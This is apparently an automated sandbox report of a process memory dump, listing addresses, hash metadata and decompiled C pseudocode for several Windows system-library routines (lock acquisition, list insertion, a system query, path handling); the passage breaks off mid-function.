                                                              0x04bf0f0b
                                                              0x04bf0f12
                                                              0x04bf0f16
                                                              0x04bf0f18
                                                              0x04bf0f1b
                                                              0x04bf0f2c
                                                              0x04bf0f31
                                                              0x04bf0f31
                                                              0x04bf0f35
                                                              0x04bf0f39
                                                              0x04bf0f3a
                                                              0x04bf0f3c
                                                              0x04bf0f3f
                                                              0x04bf0f50
                                                              0x04bf0f55
                                                              0x04bf0f55
                                                              0x04bf0f59
                                                              0x04b952eb
                                                              0x04b952f1
                                                              0x04b952f1
                                                              0x04bf0e7d
                                                              0x04bf0e84
                                                              0x04bf0e88
                                                              0x04bf0e8a
                                                              0x04bf0e8d
                                                              0x04bf0e9e
                                                              0x04bf0ea3
                                                              0x04bf0ea3
                                                              0x04bf0ea7
                                                              0x04bf0eaf
                                                              0x04bf0eb3
                                                              0x04bf0eb9
                                                              0x04bf0eb9
                                                              0x04bf0ebc
                                                              0x04bf0ecd
                                                              0x04bf0ecd
                                                              0x00000000
                                                              0x04bf0eb3
                                                              0x04bf0e21
                                                              0x04bf0e2b
                                                              0x04bf0e2f
                                                              0x04bf0e30
                                                              0x04bf0e3a
                                                              0x04bf0e3f
                                                              0x04bf0e41
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf0e47
                                                              0x00000000
                                                              0x04bf0e47
                                                              0x04bf0df9
                                                              0x04bf0dfe
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf0dfe
                                                              0x04b95303
                                                              0x04b95307
                                                              0x00000000
                                                              0x04b95309
                                                              0x00000000
                                                              0x04b95309
                                                              0x04b95307
                                                              0x04b952e9
                                                              0x04b952e9
                                                              0x00000000
                                                              0x04b952e9
                                                              0x04b9530e
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f69842f356664a4efc1b61fd7707ca46794256f28089dc52fab24667a4067842
                                                              • Instruction ID: 1700f74f430653cae567cd5aa22eb642784b64df7b7fac42534b4f8a73f60f11
                                                              • Opcode Fuzzy Hash: f69842f356664a4efc1b61fd7707ca46794256f28089dc52fab24667a4067842
                                                              • Instruction Fuzzy Hash: DB51CF71249341ABEB21EF24CC40B27BBE5FF40718F1449AEE59987661E770F848CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E04BAEF40(intOrPtr __ecx) {
                                                              				char _v5;
                                                              				char _v6;
                                                              				char _v7;
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t58;
                                                              				char _t59;
                                                              				signed char _t69;
                                                              				void* _t73;
                                                              				signed int _t74;
                                                              				char _t79;
                                                              				signed char _t81;
                                                              				signed int _t85;
                                                              				signed int _t87;
                                                              				intOrPtr _t90;
                                                              				signed char* _t91;
                                                              				void* _t92;
                                                              				signed int _t94;
                                                              				void* _t96;
                                                              
                                                              				_t90 = __ecx;
                                                              				_v16 = __ecx;
                                                              				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                              					_t58 =  *((intOrPtr*)(__ecx));
                                                              					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                              						E04B99080(_t73, __ecx, __ecx, _t92);
                                                              					}
                                                              				}
                                                              				_t74 = 0;
                                                              				_t96 =  *0x7ffe036a - 1;
                                                              				_v12 = 0;
                                                              				_v7 = 0;
                                                              				if(_t96 > 0) {
                                                              					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                              					_v12 = _t74;
                                                              					_v7 = _t96 != 0;
                                                              				}
                                                              				_t79 = 0;
                                                              				_v8 = 0;
                                                              				_v5 = 0;
                                                              				while(1) {
                                                              					L4:
                                                              					_t59 = 1;
                                                              					L5:
                                                              					while(1) {
                                                              						if(_t59 == 0) {
                                                              							L12:
                                                              							_t21 = _t90 + 4; // 0x77dfc21e
                                                              							_t87 =  *_t21;
                                                              							_v6 = 0;
                                                              							if(_t79 != 0) {
                                                              								if((_t87 & 0x00000002) != 0) {
                                                              									goto L19;
                                                              								}
                                                              								if((_t87 & 0x00000001) != 0) {
                                                              									_v6 = 1;
                                                              									_t74 = _t87 ^ 0x00000003;
                                                              								} else {
                                                              									_t51 = _t87 - 2; // -2
                                                              									_t74 = _t51;
                                                              								}
                                                              								goto L15;
                                                              							} else {
                                                              								if((_t87 & 0x00000001) != 0) {
                                                              									_v6 = 1;
                                                              									_t74 = _t87 ^ 0x00000001;
                                                              								} else {
                                                              									_t26 = _t87 - 4; // -4
                                                              									_t74 = _t26;
                                                              									if((_t74 & 0x00000002) == 0) {
                                                              										_t74 = _t74 - 2;
                                                              									}
                                                              								}
                                                              								L15:
                                                              								if(_t74 == _t87) {
                                                              									L19:
                                                              									E04B92D8A(_t74, _t90, _t87, _t90);
                                                              									_t74 = _v12;
                                                              									_v8 = 1;
                                                              									if(_v7 != 0 && _t74 > 0x64) {
                                                              										_t74 = _t74 - 1;
                                                              										_v12 = _t74;
                                                              									}
                                                              									_t79 = _v5;
                                                              									goto L4;
                                                              								}
                                                              								asm("lock cmpxchg [esi], ecx");
                                                              								if(_t87 != _t87) {
                                                              									_t74 = _v12;
                                                              									_t59 = 0;
                                                              									_t79 = _v5;
                                                              									continue;
                                                              								}
                                                              								if(_v6 != 0) {
                                                              									_t74 = _v12;
                                                              									L25:
                                                              									if(_v7 != 0) {
                                                              										if(_t74 < 0x7d0) {
                                                              											if(_v8 == 0) {
                                                              												_t74 = _t74 + 1;
                                                              											}
                                                              										}
                                                              										_t38 = _t90 + 0x14; // 0x0
                                                              										_t39 = _t90 + 0x14; // 0x0
                                                              										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                              										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                              											_t85 = _t85 & 0xff000000;
                                                              										}
                                                              										 *(_t90 + 0x14) = _t85;
                                                              									}
                                                              									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                              									return 0;
                                                              								}
                                                              								_v5 = 1;
                                                              								_t87 = _t74;
                                                              								goto L19;
                                                              							}
                                                              						}
                                                              						_t94 = _t74;
                                                              						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                              						if(_t74 == 0) {
                                                              							goto L12;
                                                              						} else {
                                                              							_t91 = _t90 + 4;
                                                              							goto L8;
                                                              							L9:
                                                              							while((_t81 & 0x00000001) != 0) {
                                                              								_t69 = _t81;
                                                              								asm("lock cmpxchg [edi], edx");
                                                              								if(_t69 != _t81) {
                                                              									_t81 = _t69;
                                                              									continue;
                                                              								}
                                                              								_t90 = _v16;
                                                              								goto L25;
                                                              							}
                                                              							asm("pause");
                                                              							_t94 = _t94 - 1;
                                                              							if(_t94 != 0) {
                                                              								L8:
                                                              								_t81 =  *_t91;
                                                              								goto L9;
                                                              							} else {
                                                              								_t90 = _v16;
                                                              								_t79 = _v5;
                                                              								goto L12;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              			}




























                                                              0x04baef4b
                                                              0x04baef4d
                                                              0x04baef57
                                                              0x04baf0bd
                                                              0x04baf0c2
                                                              0x04baf0d2
                                                              0x04baf0d2
                                                              0x04baf0c2
                                                              0x04baef5d
                                                              0x04baef5f
                                                              0x04baef67
                                                              0x04baef6a
                                                              0x04baef6d
                                                              0x04baef74
                                                              0x04baef7f
                                                              0x04baef82
                                                              0x04baef82
                                                              0x04baef86
                                                              0x04baef88
                                                              0x04baef8c
                                                              0x04baef8f
                                                              0x04baef8f
                                                              0x04baef8f
                                                              0x00000000
                                                              0x04baef91
                                                              0x04baef93
                                                              0x04baefc4
                                                              0x04baefc4
                                                              0x04baefc4
                                                              0x04baefca
                                                              0x04baefd0
                                                              0x04baf0a6
                                                              0x00000000
                                                              0x00000000
                                                              0x04baf0af
                                                              0x04bfbb06
                                                              0x04bfbb0a
                                                              0x04baf0b5
                                                              0x04baf0b5
                                                              0x04baf0b5
                                                              0x04baf0b5
                                                              0x00000000
                                                              0x04baefd6
                                                              0x04baefd9
                                                              0x04baf0de
                                                              0x04baf0e2
                                                              0x04baefdf
                                                              0x04baefdf
                                                              0x04baefdf
                                                              0x04baefe5
                                                              0x04bfbafc
                                                              0x04bfbafc
                                                              0x04baefe5
                                                              0x04baefeb
                                                              0x04baefed
                                                              0x04baf00f
                                                              0x04baf011
                                                              0x04baf01a
                                                              0x04baf01d
                                                              0x04baf021
                                                              0x04baf028
                                                              0x04baf029
                                                              0x04baf029
                                                              0x04baf02c
                                                              0x00000000
                                                              0x04baf02c
                                                              0x04baeff3
                                                              0x04baeff9
                                                              0x04baf0ea
                                                              0x04baf0ed
                                                              0x04baf0ef
                                                              0x00000000
                                                              0x04baf0ef
                                                              0x04baf003
                                                              0x04bfbb12
                                                              0x04baf045
                                                              0x04baf049
                                                              0x04baf051
                                                              0x04baf09e
                                                              0x04baf0a0
                                                              0x04baf0a0
                                                              0x04baf09e
                                                              0x04baf053
                                                              0x04baf064
                                                              0x04baf064
                                                              0x04baf06b
                                                              0x04bfbb1a
                                                              0x04bfbb1a
                                                              0x04baf071
                                                              0x04baf071
                                                              0x04baf07d
                                                              0x04baf082
                                                              0x04baf08f
                                                              0x04baf08f
                                                              0x04baf009
                                                              0x04baf00d
                                                              0x00000000
                                                              0x04baf00d
                                                              0x04baefd0
                                                              0x04baef97
                                                              0x04baefa5
                                                              0x04baefaa
                                                              0x00000000
                                                              0x04baefac
                                                              0x04baefac
                                                              0x04baefac
                                                              0x00000000
                                                              0x04baefb2
                                                              0x04baf036
                                                              0x04baf03a
                                                              0x04baf040
                                                              0x04baf090
                                                              0x00000000
                                                              0x04baf092
                                                              0x04baf042
                                                              0x00000000
                                                              0x04baf042
                                                              0x04baefb7
                                                              0x04baefb9
                                                              0x04baefbc
                                                              0x04baefb0
                                                              0x04baefb0
                                                              0x00000000
                                                              0x04baefbe
                                                              0x04baefbe
                                                              0x04baefc1
                                                              0x00000000
                                                              0x04baefc1
                                                              0x04baefbc
                                                              0x04baefaa
                                                              0x04baef91

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                              • Instruction ID: 0ea5bf53221496dacd15912fd678558e745a27fbb6cd4c80e0b02d7250d48a63
                                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                              • Instruction Fuzzy Hash: 4D51EF30A08249EFEB24CF68C0D07EEBBB1EF45314F1881E8D64597281D376B9A9D791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E04C6740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                              				signed short* _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _t55;
                                                              				void* _t56;
                                                              				intOrPtr* _t66;
                                                              				intOrPtr* _t69;
                                                              				void* _t74;
                                                              				intOrPtr* _t78;
                                                              				intOrPtr* _t81;
                                                              				intOrPtr* _t82;
                                                              				intOrPtr _t83;
                                                              				signed short* _t84;
                                                              				intOrPtr _t85;
                                                              				signed int _t87;
                                                              				intOrPtr* _t90;
                                                              				intOrPtr* _t93;
                                                              				intOrPtr* _t94;
                                                              				void* _t98;
                                                              
                                                              				_t84 = __edx;
                                                              				_t80 = __ecx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t55 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t87 =  *__edx & 0x0000ffff;
                                                              				_v12 = __ecx;
                                                              				_t3 = _t55 + 0x154; // 0x154
                                                              				_t93 = _t3;
                                                              				_t78 =  *_t93;
                                                              				_t4 = _t87 + 2; // 0x2
                                                              				_t56 = _t4;
                                                              				while(_t78 != _t93) {
                                                              					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                              						L4:
                                                              						_t78 =  *_t78;
                                                              						continue;
                                                              					} else {
                                                              						_t7 = _t78 + 0x18; // 0x18
                                                              						if(E04BED4F0(_t7, _t84[2], _t87) == _t87) {
                                                              							_t40 = _t78 + 0xc; // 0xc
                                                              							_t94 = _t40;
                                                              							_t90 =  *_t94;
                                                              							while(_t90 != _t94) {
                                                              								_t41 = _t90 + 8; // 0x8
                                                              								_t74 = E04BDF380(_a4, _t41, 0x10);
                                                              								_t98 = _t98 + 0xc;
                                                              								if(_t74 != 0) {
                                                              									_t90 =  *_t90;
                                                              									continue;
                                                              								}
                                                              								goto L12;
                                                              							}
                                                              							_t82 = L04BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                              							if(_t82 != 0) {
                                                              								_t46 = _t78 + 0xc; // 0xc
                                                              								_t69 = _t46;
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								_t85 =  *_t69;
                                                              								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              									L20:
                                                              									_t82 = 3;
                                                              									asm("int 0x29");
                                                              								}
                                                              								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                              								 *_t82 = _t85;
                                                              								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                              								 *_t69 = _t82;
                                                              								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                              								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                              								goto L11;
                                                              							} else {
                                                              								L18:
                                                              								_push(0xe);
                                                              								_pop(0);
                                                              							}
                                                              						} else {
                                                              							_t84 = _v8;
                                                              							_t9 = _t87 + 2; // 0x2
                                                              							_t56 = _t9;
                                                              							goto L4;
                                                              						}
                                                              					}
                                                              					L12:
                                                              					return 0;
                                                              				}
                                                              				_t10 = _t87 + 0x1a; // 0x1a
                                                              				_t78 = L04BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                              				if(_t78 == 0) {
                                                              					goto L18;
                                                              				} else {
                                                              					_t12 = _t87 + 2; // 0x2
                                                              					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                              					_t16 = _t78 + 0x18; // 0x18
                                                              					E04BDF3E0(_t16, _v8[2], _t87);
                                                              					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                              					_t19 = _t78 + 0xc; // 0xc
                                                              					_t66 = _t19;
                                                              					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                              					 *_t66 = _t66;
                                                              					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                              					_t81 = L04BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                              					if(_t81 == 0) {
                                                              						goto L18;
                                                              					} else {
                                                              						_t26 = _t78 + 0xc; // 0xc
                                                              						_t69 = _t26;
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						_t85 =  *_t69;
                                                              						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              							goto L20;
                                                              						} else {
                                                              							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                              							 *_t81 = _t85;
                                                              							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                              							 *_t69 = _t81;
                                                              							_t83 = _v12;
                                                              							 *(_t78 + 8) = 1;
                                                              							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                              							_t34 = _t83 + 0x154; // 0x1ba
                                                              							_t69 = _t34;
                                                              							_t85 =  *_t69;
                                                              							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              								goto L20;
                                                              							} else {
                                                              								 *_t78 = _t85;
                                                              								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                              								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                              								 *_t69 = _t78;
                                                              								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                              							}
                                                              						}
                                                              						goto L11;
                                                              					}
                                                              				}
                                                              				goto L12;
                                                              			}





















                                                              0x04c6740d
                                                              0x04c6740d
                                                              0x04c67412
                                                              0x04c67413
                                                              0x04c67416
                                                              0x04c67418
                                                              0x04c6741c
                                                              0x04c6741f
                                                              0x04c67422
                                                              0x04c67422
                                                              0x04c67428
                                                              0x04c6742a
                                                              0x04c6742a
                                                              0x04c67451
                                                              0x04c67432
                                                              0x04c6744f
                                                              0x04c6744f
                                                              0x00000000
                                                              0x04c67434
                                                              0x04c67438
                                                              0x04c67443
                                                              0x04c67517
                                                              0x04c67517
                                                              0x04c6751a
                                                              0x04c67535
                                                              0x04c67520
                                                              0x04c67527
                                                              0x04c6752c
                                                              0x04c67531
                                                              0x04c67533
                                                              0x00000000
                                                              0x04c67533
                                                              0x00000000
                                                              0x04c67531
                                                              0x04c6754b
                                                              0x04c6754f
                                                              0x04c6755c
                                                              0x04c6755c
                                                              0x04c6755f
                                                              0x04c67560
                                                              0x04c67561
                                                              0x04c67562
                                                              0x04c67563
                                                              0x04c67568
                                                              0x04c6756a
                                                              0x04c6756c
                                                              0x04c6756d
                                                              0x04c6756d
                                                              0x04c6756f
                                                              0x04c67572
                                                              0x04c67574
                                                              0x04c67577
                                                              0x04c6757c
                                                              0x04c6757f
                                                              0x00000000
                                                              0x04c67551
                                                              0x04c67551
                                                              0x04c67551
                                                              0x04c67553
                                                              0x04c67553
                                                              0x04c67449
                                                              0x04c67449
                                                              0x04c6744c
                                                              0x04c6744c
                                                              0x00000000
                                                              0x04c6744c
                                                              0x04c67443
                                                              0x04c6750e
                                                              0x04c67514
                                                              0x04c67514
                                                              0x04c67455
                                                              0x04c67469
                                                              0x04c6746d
                                                              0x00000000
                                                              0x04c67473
                                                              0x04c67473
                                                              0x04c67476
                                                              0x04c67480
                                                              0x04c67484
                                                              0x04c6748e
                                                              0x04c67493
                                                              0x04c67493
                                                              0x04c67496
                                                              0x04c67499
                                                              0x04c674a1
                                                              0x04c674b1
                                                              0x04c674b5
                                                              0x00000000
                                                              0x04c674bb
                                                              0x04c674c1
                                                              0x04c674c1
                                                              0x04c674c4
                                                              0x04c674c5
                                                              0x04c674c6
                                                              0x04c674c7
                                                              0x04c674c8
                                                              0x04c674cd
                                                              0x00000000
                                                              0x04c674d3
                                                              0x04c674d3
                                                              0x04c674d6
                                                              0x04c674d8
                                                              0x04c674db
                                                              0x04c674dd
                                                              0x04c674e0
                                                              0x04c674e7
                                                              0x04c674ee
                                                              0x04c674ee
                                                              0x04c674f4
                                                              0x04c674f9
                                                              0x00000000
                                                              0x04c674fb
                                                              0x04c674fb
                                                              0x04c674fd
                                                              0x04c67500
                                                              0x04c67503
                                                              0x04c67505
                                                              0x04c67505
                                                              0x04c674f9
                                                              0x00000000
                                                              0x04c674cd
                                                              0x04c674b5
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                              • Instruction ID: 2081e35e81b45ab5027d005e0af6161437620c0bc252ae0739f45858ace69c0f
                                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                              • Instruction Fuzzy Hash: CC516D71601606EFDB15CF54C480A96BBB6FF45308F19C5EAE9099F212E371EA45CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E04BC4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				char _v176;
                                                              				char _v177;
                                                              				char _v184;
                                                              				intOrPtr _v192;
                                                              				intOrPtr _v196;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed short _t42;
                                                              				char* _t44;
                                                              				intOrPtr _t46;
                                                              				intOrPtr _t50;
                                                              				char* _t57;
                                                              				intOrPtr _t59;
                                                              				intOrPtr _t67;
                                                              				signed int _t69;
                                                              
                                                              				_t64 = __edx;
                                                              				_v12 =  *0x4c8d360 ^ _t69;
                                                              				_t65 = 0xa0;
                                                              				_v196 = __edx;
                                                              				_v177 = 0;
                                                              				_t67 = __ecx;
                                                              				_v192 = __ecx;
                                                              				E04BDFA60( &_v176, 0, 0xa0);
                                                              				_t57 =  &_v176;
                                                              				_t59 = 0xa0;
                                                              				if( *0x4c87bc8 != 0) {
                                                              					L3:
                                                              					while(1) {
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						_t67 = _v192;
                                                              						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                              						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                              						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                              						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                              						_push( &_v184);
                                                              						_push(_t59);
                                                              						_push(_t57);
                                                              						_push(0xa0);
                                                              						_push(_t57);
                                                              						_push(0xf);
                                                              						_t42 = E04BDB0B0();
                                                              						if(_t42 != 0xc0000023) {
                                                              							break;
                                                              						}
                                                              						if(_v177 != 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                              						}
                                                              						_v177 = 1;
                                                              						_t44 = L04BB4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                              						_t59 = _v184;
                                                              						_t57 = _t44;
                                                              						if(_t57 != 0) {
                                                              							continue;
                                                              						} else {
                                                              							_t42 = 0xc0000017;
                                                              							break;
                                                              						}
                                                              					}
                                                              					if(_t42 != 0) {
                                                              						_t65 = E04B9CCC0(_t42);
                                                              						if(_t65 != 0) {
                                                              							L10:
                                                              							if(_v177 != 0) {
                                                              								if(_t57 != 0) {
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                              								}
                                                              							}
                                                              							_t46 = _t65;
                                                              							L12:
                                                              							return E04BDB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                              						}
                                                              						L7:
                                                              						_t50 = _a4;
                                                              						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                              						if(_t50 != 3) {
                                                              							if(_t50 == 2) {
                                                              								goto L8;
                                                              							}
                                                              							L9:
                                                              							if(E04BDF380(_t67 + 0xc, 0x4b75138, 0x10) == 0) {
                                                              								 *0x4c860d8 = _t67;
                                                              							}
                                                              							goto L10;
                                                              						}
                                                              						L8:
                                                              						_t64 = _t57 + 0x28;
                                                              						E04BC4F49(_t67, _t57 + 0x28);
                                                              						goto L9;
                                                              					}
                                                              					_t65 = 0;
                                                              					goto L7;
                                                              				}
                                                              				if(E04BC4E70(0x4c886b0, 0x4bc5690, 0, 0) != 0) {
                                                              					_t46 = E04B9CCC0(_t56);
                                                              					goto L12;
                                                              				} else {
                                                              					_t59 = 0xa0;
                                                              					goto L3;
                                                              				}
                                                              			}




















                                                              0x04bc4d3b
                                                              0x04bc4d4d
                                                              0x04bc4d53
                                                              0x04bc4d58
                                                              0x04bc4d65
                                                              0x04bc4d6c
                                                              0x04bc4d71
                                                              0x04bc4d77
                                                              0x04bc4d7f
                                                              0x04bc4d8c
                                                              0x04bc4d8e
                                                              0x04bc4dad
                                                              0x04bc4db0
                                                              0x04bc4db7
                                                              0x04bc4db8
                                                              0x04bc4db9
                                                              0x04bc4dba
                                                              0x04bc4dbb
                                                              0x04bc4dc1
                                                              0x04bc4dc8
                                                              0x04bc4dcc
                                                              0x04bc4dd5
                                                              0x04bc4dde
                                                              0x04bc4ddf
                                                              0x04bc4de0
                                                              0x04bc4de1
                                                              0x04bc4de6
                                                              0x04bc4de7
                                                              0x04bc4de9
                                                              0x04bc4df3
                                                              0x00000000
                                                              0x00000000
                                                              0x04c06c7c
                                                              0x04c06c8a
                                                              0x04c06c8a
                                                              0x04c06c9d
                                                              0x04c06ca7
                                                              0x04c06cac
                                                              0x04c06cb2
                                                              0x04c06cb9
                                                              0x00000000
                                                              0x04c06cbf
                                                              0x04c06cbf
                                                              0x00000000
                                                              0x04c06cbf
                                                              0x04c06cb9
                                                              0x04bc4dfb
                                                              0x04c06ccf
                                                              0x04c06cd3
                                                              0x04bc4e32
                                                              0x04bc4e39
                                                              0x04c06ce0
                                                              0x04c06cf2
                                                              0x04c06cf2
                                                              0x04c06ce0
                                                              0x04bc4e3f
                                                              0x04bc4e41
                                                              0x04bc4e51
                                                              0x04bc4e51
                                                              0x04bc4e03
                                                              0x04bc4e03
                                                              0x04bc4e09
                                                              0x04bc4e0f
                                                              0x04bc4e57
                                                              0x00000000
                                                              0x00000000
                                                              0x04bc4e1b
                                                              0x04bc4e30
                                                              0x04bc4e5b
                                                              0x04bc4e5b
                                                              0x00000000
                                                              0x04bc4e30
                                                              0x04bc4e11
                                                              0x04bc4e11
                                                              0x04bc4e16
                                                              0x00000000
                                                              0x04bc4e16
                                                              0x04bc4e01
                                                              0x00000000
                                                              0x04bc4e01
                                                              0x04bc4da5
                                                              0x04c06c6b
                                                              0x00000000
                                                              0x04bc4dab
                                                              0x04bc4dab
                                                              0x00000000
                                                              0x04bc4dab

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee9659e0526ac5eaf956d9ec6c007b0435e7373555a64d22279610313d8c166b
                                                              • Instruction ID: 63e7e1d22ca2090de0ebde01e008ba195489e9f42c2a85f576576e636dbe8745
                                                              • Opcode Fuzzy Hash: ee9659e0526ac5eaf956d9ec6c007b0435e7373555a64d22279610313d8c166b
                                                              • Instruction Fuzzy Hash: 1241C071B40318AFEB25DF14CD90BAAB7AAEB44714F0144EDE8459B280E7B4FE408B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BD3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                              				intOrPtr _v8;
                                                              				char _v12;
                                                              				signed short** _t33;
                                                              				short* _t38;
                                                              				intOrPtr* _t39;
                                                              				intOrPtr* _t41;
                                                              				signed short _t43;
                                                              				intOrPtr* _t47;
                                                              				intOrPtr* _t53;
                                                              				signed short _t57;
                                                              				intOrPtr _t58;
                                                              				signed short _t60;
                                                              				signed short* _t61;
                                                              
                                                              				_t47 = __ecx;
                                                              				_t61 = __edx;
                                                              				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                              				if(_t60 > 0xfffe) {
                                                              					L22:
                                                              					return 0xc0000106;
                                                              				}
                                                              				if(__edx != 0) {
                                                              					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                              						L5:
                                                              						E04BA7B60(0, _t61, 0x4b711c4);
                                                              						_v12 =  *_t47;
                                                              						_v12 = _v12 + 0xfff8;
                                                              						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                              						E04BA7B60(0xfff8, _t61,  &_v12);
                                                              						_t33 = _a8;
                                                              						if(_t33 != 0) {
                                                              							 *_t33 = _t61;
                                                              						}
                                                              						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              						_t53 = _a12;
                                                              						if(_t53 != 0) {
                                                              							_t57 = _t61[2];
                                                              							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                              							while(_t38 >= _t57) {
                                                              								if( *_t38 == 0x5c) {
                                                              									_t41 = _t38 + 2;
                                                              									if(_t41 == 0) {
                                                              										break;
                                                              									}
                                                              									_t58 = 0;
                                                              									if( *_t41 == 0) {
                                                              										L19:
                                                              										 *_t53 = _t58;
                                                              										goto L7;
                                                              									}
                                                              									 *_t53 = _t41;
                                                              									goto L7;
                                                              								}
                                                              								_t38 = _t38 - 2;
                                                              							}
                                                              							_t58 = 0;
                                                              							goto L19;
                                                              						} else {
                                                              							L7:
                                                              							_t39 = _a16;
                                                              							if(_t39 != 0) {
                                                              								 *_t39 = 0;
                                                              								 *((intOrPtr*)(_t39 + 4)) = 0;
